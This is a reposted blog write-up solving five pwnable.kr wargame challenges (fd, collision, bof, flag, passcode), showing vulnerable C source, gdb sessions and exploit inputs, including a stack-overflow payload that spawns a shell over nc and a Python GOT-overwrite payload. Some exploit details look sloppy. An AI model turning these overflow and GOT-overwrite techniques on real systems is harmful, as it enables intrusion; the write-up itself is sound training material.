PWNABLE CTF’S ANWSER FROM FLAG TO PASSCODE

最新推荐文章于 2021-10-24 17:08:02 发布
weixin_30667301
最新推荐文章于 2021-10-24 17:08:02 发布
阅读量3k
点赞数
文章标签： python
原文链接：http://www.cnblogs.com/heycomputer/articles/10963697.html
版权
1.[fd]

fd@ubuntu:~$ cat fd.c 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
	if(argc<2){
		printf("pass argv[1] a number\n");
		return 0;
	}
	int fd = atoi( argv[1] ) - 0x1234;             //convert argv[1] to hex
	int len = 0;
	len = read(fd, buf, 32);                       // Read 32 counts start with fd(=0) into buff.
	if(!strcmp("LETMEWIN\n", buf)){                // if buf="LETMEWIN",good job!
		printf("good job :)\n");
		system("/bin/cat flag");
		exit(0);
	}
	printf("learn about Linux file IO\n");
	return 0;

}

---------------------------------------------------------------------------------------------------------------------------------------
Solution:

fd@ubuntu:~$ python -c 'print 0x1234'
4660

fd@ubuntu:~$ ./fd  4660
LETMEWIN
good job :)
mommy! I think I know what a file descriptor is!!     //Got auth flag!

--------------------------------------------------------------------------------------------------------------------------------------
	
2.collision

col@ubuntu:~$ cat col.c
#include <stdio.h>
#include <string.h>
unsigned long hashcode = 0x21DD09EC; 
unsigned long check_password(const char* p){
	int* ip = (int*)p;
	int i;
	int res=0;
	for(i=0; i<5; i++){
		res += ip[i];
	}
	return res;
}

int main(int argc, char* argv[]){
	if(argc<2){
		printf("usage : %s [passcode]\n", argv[0]);
		return 0;
	}
	if(strlen(argv[1]) != 20){                                 //The length of passcode is 20
		printf("passcode length should be 20 bytes\n");
		return 0;
	}

	if(hashcode == check_password( argv[1] )){                 //If check_password(passcode) == hashcode,could pass.
		system("/bin/cat flag");
		return 0;
	}
	else
		printf("wrong passcode.\n");
	return 0;
}
---------------------------------------------------------------------------------------------------------------------------------------
Solution:

We could assume all hex values for first 16 charactors is '0x01',so every 4 charactors's hex value is "0x01010101"
So the hex value for the left is:0x21DD09EC - 0x01010101*4 = 0x1dd905e8

col@ubuntu:~$ python -c 'print hex(0x21DD09EC - 0x01010101*4)'
0x1dd905e8

We could create a input passcode like "\x01\x01\x01\x01"*4 + "\xe8\x05\xd9\x1d".

col@ubuntu:~$ ./col  `python -c 'print "\x01\x01\x01\x01"*4 + "\xe8\x05\xd9\x1d"'`
daddy! I just managed to create a hash collision :)            //get the flag
-----------------------------------------------------------------------------------------------------------------------------------------

3.bof

yuanjideMacBook-Air:yuanjizhao root# cat bof.c 
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

---------------------------------------------------------------------------------------------------------------------------------------
Solution:
Download the program.
root@debian:~/pwnable# wget http://pwnable.kr/bin/bof

Use gdb to debug it.
root@debian:~/pwnable# gdb bof
gdb-peda$ start                       
gdb-peda$ disassemble func
Dump of assembler code for function func:
   0x0040062c <+0>:     push   ebp
   0x0040062d <+1>:     mov    ebp,esp
   0x0040062f <+3>:     sub    esp,0x48
   0x00400632 <+6>:     mov    eax,gs:0x14
   0x00400638 <+12>:    mov    DWORD PTR [ebp-0xc],eax
   0x0040063b <+15>:    xor    eax,eax
   0x0040063d <+17>:    mov    DWORD PTR [esp],0x40078c
   0x00400644 <+24>:    call   0xb7e532c0 <__GI__IO_puts>
   0x00400649 <+29>:    lea    eax,[ebp-0x2c]
   0x0040064c <+32>:    mov    DWORD PTR [esp],eax
   0x0040064f <+35>:    call   0xb7e52a60 <_IO_gets>
=> 0x00400654 <+40>:    cmp    DWORD PTR [ebp+0x8],0xcafebabe        //if $ebp+0x8=0xcafebabe,pass.
   0x0040065b <+47>:    jne    0x40066b <func+63>
   0x0040065d <+49>:    mov    DWORD PTR [esp],0x40079b
   0x00400664 <+56>:    call   0xb7e28c00 <__libc_system>
   0x00400669 <+61>:    jmp    0x400677 <func+75>
   0x0040066b <+63>:    mov    DWORD PTR [esp],0x4007a3
   0x00400672 <+70>:    call   0xb7e532c0 <__GI__IO_puts>
   0x00400677 <+75>:    mov    eax,DWORD PTR [ebp-0xc]
   0x0040067a <+78>:    xor    eax,DWORD PTR gs:0x14
   0x00400681 <+85>:    je     0x400688 <func+92>
   0x00400683 <+87>:    call   0xb7ef5080 <__stack_chk_fail>
   0x00400688 <+92>:    leave  
   0x00400689 <+93>:    ret    
End of assembler dump.
gdb-peda$ b * 0x00400654
Breakpoint 2 at 0x400654
gdb-peda$ def hook-stop                 
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/24wx $esp
>x/2i $eip
>x/wx $ebp+0x8
>end
gdb-peda$ r
Starting program: /root/pwnable/bof 
overflow me : 
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
0xbffffbf0:     0xbffffc0c      0xbffffcf4      0xb7fc4000      0x00000000
0xbffffc00:     0x00000000      0xb7fc4000      0xb7e1bcb9      0x41414141
0xbffffc10:     0x42424242      0x43434343      0x44444444      0x45454545
0xbffffc20:     0x46464646      0x47474747      0x48484848      0x49494949
0xbffffc30:     0x4a4a4a4a      0x4b4b4b4b      0x4c4c4c4c      0x4d4d4d4d
0xbffffc40:     0x4e4e4e4e      0x4f4f4f4f      0x50505050      0x51515151
=> 0x400654 <func+40>:  cmp    DWORD PTR [ebp+0x8],0xcafebabe
   0x40065b <func+47>:  jne    0x40066b <func+63>
0xbffffc40:     0x4e4e4e4e                                

Breakpoint 2, 0x00400654 in func ()
gdb-peda$ !
root@debian:~/pwnable# python -c 'print chr(0x4e)'
N                                                    //The value for the address 0xbffffc40 is "NNNN",change it to hex value 0xcafebabe,we'll get the exploit successfully. So,create a payload use python like the below.

root@debian:~/pwnable# python -c 'print "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM"+"\xbe\xba\xfe\xca"'  > attack.txt

Return to gdb session use "exit".
gdb-peda$ r < attack.txt
gdb-peda$ r < attack.txt 
Starting program: /root/pwnable/bof < attack.txt
overflow me : 
0xbffffbf0:     0xbffffc0c      0xbffffcf4      0xb7fc4000      0x00000000
0xbffffc00:     0x00000000      0xb7fc4000      0xb7e1bcb9      0x41414141
0xbffffc10:     0x42424242      0x43434343      0x44444444      0x45454545
0xbffffc20:     0x46464646      0x47474747      0x48484848      0x49494949
0xbffffc30:     0x4a4a4a4a      0x4b4b4b4b      0x4c4c4c4c      0x4d4d4d4d
0xbffffc40:     0xcafebabe      0x00000000      0x004006b9      0x00000000
=> 0x400654 <func+40>:  cmp    DWORD PTR [ebp+0x8],0xcafebabe
   0x40065b <func+47>:  jne    0x40066b <func+63>
0xbffffc40:     0xcafebabe

Breakpoint 2, 0x00400654 in func ()
gdb-peda$ c                              //exploit to /usr/bin/dash.
Continuing.
[Attaching after process 4430 fork to child process 4437]
[New inferior 2 (process 4437)]
[Detaching after fork from parent process 4430]
[Inferior 1 (process 4430) detached]
process 4437 is executing new program: /usr/bin/dash
[Attaching after process 4437 fork to child process 4441]
[New inferior 3 (process 4441)]
[Detaching after fork from parent process 4437]
[Inferior 2 (process 4437) detached]
process 4441 is executing new program: /usr/bin/dash
*** stack smashing detected ***: <unknown> terminated
[Inferior 3 (process 4441) exited normally]
Error while running hook_stop:
No registers.
gdb-peda$ quit

root@debian:~/pwnable# (cat attack.txt;cat) |nc pwnable.kr 9000       //Or use (python -c 'print "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM"+"\xbe\xba\xfe\xca"';cat) | nc pwnable.kr 9000  
id
uid=1008(bof) gid=1008(bof) groups=1008(bof)
ls
bof
bof.c
flag
log
log2
super.pl
cat flag
daddy, I just pwned a buFFer :)            //the answer flag

--------------------------------------------------------------------------------------------------------------------------------------

4.flag

root@ubuntu:/# wget http://pwnable.kr/bin/flag

root@ubuntu:/# od -t x1z flag|more                  //use od command to check the file.
0000000 7f 45 4c 46 02 01 01 03 00 00 00 00 00 00 00 00  >.ELF............<
0000020 02 00 3e 00 01 00 00 00 f0 a4 44 00 00 00 00 00  >..>.......D.....<
0000040 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  >@...............<
0000060 00 00 00 00 40 00 38 00 02 00 40 00 00 00 00 00  >....@.8...@.....<
0000100 01 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00  >................<
0000120 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00  >..@.......@.....<
0000140 04 ad 04 00 00 00 00 00 04 ad 04 00 00 00 00 00  >................<
0000160 00 00 20 00 00 00 00 00 01 00 00 00 06 00 00 00  >.. .............<
0000200 d8 62 0c 00 00 00 00 00 d8 62 6c 00 00 00 00 00  >.b.......bl.....<
0000220 d8 62 6c 00 00 00 00 00 00 00 00 00 00 00 00 00  >.bl.............<
0000240 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00  >.......... .....<
0000260 fc ac e0 a1 55 50 58 21 1c 08 0d 16 00 00 00 00  >....UPX!........<           //include UPX info
0000300 21 7c 0d 00 21 7c 0d 00 90 01 00 00 92 00 00 00  >!|..!|..........<
0000320 08 00 00 00 f7 fb 93 ff 7f 45 4c 46 02 01 01 03  >.........ELF....<
0000340 00 02 00 3e 00 01 0e 58 10 40 1f df 2f ec db 40  >...>...X.@../..@<
0000360 2f 78 38 0c 45 26 38 00 06 0a 21 00 1f 6c 60 bf  >/x8.E&8...!..l`.<


root@ubuntu:/# strings flag|more                   //use strings to check
UPX!                                               //include UPX info
@/x8
gX lw_
H/\_@
	Kl$
H9\$(t
[]]y
nIV,Uh
AWAVAUATS
uSL9
>t		.
[A\AA;h

The binary has been packed by UPX packer,we should unpack it first.

root@ubuntu:/# file flag
flag.1: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped

root@ubuntu:/# upx -d flag
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2017
UPX 3.94        Markus Oberhumer, Laszlo Molnar & John Reiser   May 12th 2017

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
    883745 <-    335288   37.94%   linux/amd64   flag

Unpacked 1 file.

root@ubuntu:/# file flag
flag: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=96ec4cc272aeb383bd9ed26c0d4ac0eb5db41b16, not stripped

--------------------------------------------------------------------------------------------------------------------------------------
Solution:

Use gdb to debug the binary

root@ubuntu:/# gdb flag
gdb-peda$ disassemble  main
Dump of assembler code for function main:
   0x0000000000401164 <+0>:	push   rbp
   0x0000000000401165 <+1>:	mov    rbp,rsp
   0x0000000000401168 <+4>:	sub    rsp,0x10
   0x000000000040116c <+8>:	mov    edi,0x496658
   0x0000000000401171 <+13>:	call   0x402080 <puts>
   0x0000000000401176 <+18>:	mov    edi,0x64
   0x000000000040117b <+23>:	call   0x4099d0 <malloc>
   0x0000000000401180 <+28>:	mov    QWORD PTR [rbp-0x8],rax
   0x0000000000401184 <+32>:	mov    rdx,QWORD PTR [rip+0x2c0ee5]        # 0x6c2070 <flag>   //the value of rip+0x2c0ee5 is flag.
   0x000000000040118b <+39>:	mov    rax,QWORD PTR [rbp-0x8]
   0x000000000040118f <+43>:	mov    rsi,rdx
   0x0000000000401192 <+46>:	mov    rdi,rax
   0x0000000000401195 <+49>:	call   0x400320
   0x000000000040119a <+54>:	mov    eax,0x0
   0x000000000040119f <+59>:	leave  
   0x00000000004011a0 <+60>:	ret    
End of assembler dump.

gdb-peda$ b * 0x000000000040118b
Breakpoint 2 at 0x40118b

gdb-peda$ r

gdb-peda$ x/wx $rip+0x2c0ee5               
0x6c2070 <flag>:	0x00496628

gdb-peda$ x/s 0x00496628
0x496628:	"UPX...? sounds like a delivery service :)"          //Got the flag

--------------------------------------------------------------------------------------------------------------------------------------

5.passcode

passcode@prowl:~$ cat passcode.c 
#include <stdio.h>
#include <stdlib.h>

void login(){
	int passcode1;
	int passcode2;

	printf("enter passcode1 : ");
	scanf("%d", passcode1);
	fflush(stdin);

	// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
	printf("enter passcode2 : ");
        scanf("%d", passcode2);

	printf("checking...\n");
	if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
		exit(0);
        }
}

void welcome(){
	char name[100];
	printf("enter you name : ");
	scanf("%100s", name);
	printf("Welcome %s!\n", name);
}

int main(){
	printf("Toddler's Secure Login System 1.0 beta.\n");

	welcome();
	login();

	// something after login...
	printf("Now I can safely trust you that you have credential :)\n");
	return 0;	
}

--------------------------------------------------------------------------------------------------------------------------------------
Solution:

References:
			https://www.rootnetsec.com/pwnable.kr-passcode/
			https://github.com/chrysh/ctf_writeups/tree/master/pwnable.kr/passcode
			https://systemoverlord.com/2017/03/19/got-and-plt-for-pwning.html

In local machine. 

1> Generate a exploit string use ragg2 tool to fullfill name buffer.

root@debian:~/pwnable# ragg2 -P 100 -r;echo
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh

In target machine.

2> Use gdb to debug the binary.

passcode@prowl:~$ gdb passcode
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x08048665 <+0>:     push   ebp
   0x08048666 <+1>:     mov    ebp,esp
   0x08048668 <+3>:     and    esp,0xfffffff0
   0x0804866b <+6>:     sub    esp,0x10
   0x0804866e <+9>:     mov    DWORD PTR [esp],0x80487f0
   0x08048675 <+16>:    call   0x8048450 <puts@plt>
   0x0804867a <+21>:    call   0x8048609 <welcome>
   0x0804867f <+26>:    call   0x8048564 <login>
   0x08048684 <+31>:    mov    DWORD PTR [esp],0x8048818  
   0x0804868b <+38>:    call   0x8048450 <puts@plt>
   0x08048690 <+43>:    mov    eax,0x0
   0x08048695 <+48>:    leave  
   0x08048696 <+49>:    ret    
End of assembler dump.

(gdb) disassemble login
Dump of assembler code for function login:
   0x08048564 <+0>:     push   ebp
   0x08048565 <+1>:     mov    ebp,esp
   0x08048567 <+3>:     sub    esp,0x28
   0x0804856a <+6>:     mov    eax,0x8048770
   0x0804856f <+11>:    mov    DWORD PTR [esp],eax
   0x08048572 <+14>:    call   0x8048420 <printf@plt>
   0x08048577 <+19>:    mov    eax,0x8048783
   0x0804857c <+24>:    mov    edx,DWORD PTR [ebp-0x10]            // passcode1 = $ebp-0x10
   0x0804857f <+27>:    mov    DWORD PTR [esp+0x4],edx
   0x08048583 <+31>:    mov    DWORD PTR [esp],eax
   0x08048586 <+34>:    call   0x80484a0 <__isoc99_scanf@plt>
   0x0804858b <+39>:    mov    eax,ds:0x804a02c
   0x08048590 <+44>:    mov    DWORD PTR [esp],eax
   0x08048593 <+47>:    call   0x8048430 <fflush@plt>              // The plt for fflush() function,it's not a real address for it.
   0x08048598 <+52>:    mov    eax,0x8048786
   0x0804859d <+57>:    mov    DWORD PTR [esp],eax
   0x080485a0 <+60>:    call   0x8048420 <printf@plt>
   0x080485a5 <+65>:    mov    eax,0x8048783
   0x080485aa <+70>:    mov    edx,DWORD PTR [ebp-0xc]
   0x080485ad <+73>:    mov    DWORD PTR [esp+0x4],edx
   0x080485b1 <+77>:    mov    DWORD PTR [esp],eax
   0x080485b4 <+80>:    call   0x80484a0 <__isoc99_scanf@plt>
   0x080485b9 <+85>:    mov    DWORD PTR [esp],0x8048799
   0x080485c0 <+92>:    call   0x8048450 <puts@plt>
   0x080485c5 <+97>:    cmp    DWORD PTR [ebp-0x10],0x528e6        // Condition Jump. passcode1 == 338150
   0x080485cc <+104>:   jne    0x80485f1 <login+141>               
   0x080485ce <+106>:   cmp    DWORD PTR [ebp-0xc],0xcc07c9	   // Condition Jump. passcode2 == 13371337
   0x080485d5 <+113>:   jne    0x80485f1 <login+141>               
   0x080485d7 <+115>:   mov    DWORD PTR [esp],0x80487a5           //We could overwirte this address for system function calling later.if the stack fullfill to this address,the binary will be executed successfully.
   0x080485de <+122>:   call   0x8048450 <puts@plt>                //0x080485de and 0x080485e3 we could overwrite too,they could call system function to execute system("/bin/cat flag").
   0x080485e3 <+127>:   mov    DWORD PTR [esp],0x80487af           
   0x080485ea <+134>:   call   0x8048460 <system@plt>              // The plt for system() funtion.
   0x080485ef <+139>:   leave  
   0x080485f0 <+140>:   ret    
   0x080485f1 <+141>:   mov    DWORD PTR [esp],0x80487bd
   0x080485f8 <+148>:   call   0x8048450 <puts@plt>
   0x080485fd <+153>:   mov    DWORD PTR [esp],0x0
   0x08048604 <+160>:   call   0x8048480 <exit@plt>
End of assembler dump.
(gdb) b *0x0804857c                                           // Create a breakpoint before scanf() function.
Breakpoint 1 at 0x804857c
(gdb) r 
Starting program: /home/passcode/passcode 
Toddler's Secure Login System 1.0 beta.
enter you name : AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
Welcome AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh!

Breakpoint 1, 0x0804857c in login ()
(gdb) x/wx $ebp-0x10                                         // Display passcode1 variable's value in hex format. 
0xffaceb18:     0x68414167
(gdb) x/s $ebp-0x10                                          // Display passcode's value in string format.
0xffaceb18:     "gAAh"                                       // passcode1 == $ebp-0x10 overwrited by 0x68414167 == "gAAh",so the max of name buffer's lenth is smaller than 100,it's only 96 as real. name == "AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAA"

(gdb) disassemble 0x8048430                                  //Check the plt data for fflush function.
Dump of assembler code for function fflush@plt:
   0x08048430 <+0>:     jmp    DWORD PTR ds:0x804a004        //The real address for fflush function is 0x804a004.
   0x08048436 <+6>:     push   0x8
   0x0804843b <+11>:    jmp    0x8048410
End of assembler dump.


3> List the .plt and .got sections of the binary.

(gdb) !
passcode@prowl:~$ 

root@debian:~/pwnable# readelf -S passcode |egrep 'plt|got'
  [10] .rel.plt          REL             08048398 000398 000048 08   A  5  12  4
  [12] .plt              PROGBITS        08048410 000410 0000a0 04  AX  0   0 16
  [22] .got              PROGBITS        08049ff0 000ff0 000004 04  WA  0   0  4
  [23] .got.plt          PROGBITS        08049ff4 000ff4 000030 04  WA  0   0  4

passcode@prowl:~$ objdump -R passcode|egrep 'fflush|system'
0804a004 R_386_JUMP_SLOT   fflush@GLIBC_2.0
0804a010 R_386_JUMP_SLOT   system@GLIBC_2.0

Return to gdb

passcode@prowl:~$ exit

(gdb) x 0x0804a008
0x804a008 <__stack_chk_fail@got.plt>:   0x08048446

(gdb) x/4wx 0x0804a008
0x804a008 <__stack_chk_fail@got.plt>:   0x08048446      0x08048456      0x08048466      0x08048476

(gdb) x/10i 0x0804a008                             //Check the data for address 0x0804a008
   0x804a008 <__stack_chk_fail@got.plt>:        inc    esi  
   0x804a009 <__stack_chk_fail@got.plt+1>:      test   BYTE PTR [eax+ecx*1],al
   0x804a00c <puts@got.plt>:    push   esi
   0x804a00d <puts@got.plt+1>:  test   BYTE PTR [eax+ecx*1],al
   0x804a010 <system@got.plt>:  data16 test BYTE PTR [eax+ecx*1],al
   0x804a014 <__gmon_start__@got.plt>:  jbe    0x8049f9a
   0x804a016 <__gmon_start__@got.plt+2>:        add    al,0x8
   0x804a018 <exit@got.plt>:    xchg   BYTE PTR [esp+eax*1+0x57f54008],al
   0x804a01f <__libc_start_main@got.plt+3>:     mul    DWORD PTR [esi+0x80484]
   0x804a025:   add    BYTE PTR [eax],al

4> Create a payload for this binary.

Target:
      Overwirte the fflush function before system function calling.
1. Fullfilling name buffer.                             //"A"*96
2. Find the address of fflush() funciton.               //0x0804a004
3. Find location call of system() function.             //0x080485ea
4. Overwrite fflush's address with available address.   //After condition jump,before system calling,there have three adresses we could use.They are 0x080485d7,0x408085de,0x080485e3



Edit a python script like below.
passcode@prowl:~$ vi /tmp/passcode.py
import struct 
import random

padding = "A"*96
eip = struct.pack("I",0x804a004)           							# Overwrite address 0x804a004 as overwrite fflush function.
payload = random.choice([str(0x080485d7),str(0x408085de),str(0x080485e3)])             
print padding + eip + payload

passcode@prowl:~$ python /tmp/passcode.py |./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA� !
enter passcode1 : ����$�{������U�T$�$������$��   �����}��(
Sorry mom.. I got confused about scanf usage :(
Now I can safely trust you that you have credential :)         //Got flag successfully.
--------------------------------------------------------------------------------------------------------------------------------------
转载于:https://www.cnblogs.com/heycomputer/articles/10963697.html
weixin_30667301
关注
0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
PWNABLE CTF’S ANWSER FROM FLAG TO PASSCODE

1.[fd]fd@ubuntu:~$ cat fd.c #include <stdio.h>#include <stdlib.h>#include <string.h>char buf[32];int main(int argc, char* argv[], char* envp[]){ if(argc<2){ pri...
复制链接

扫一扫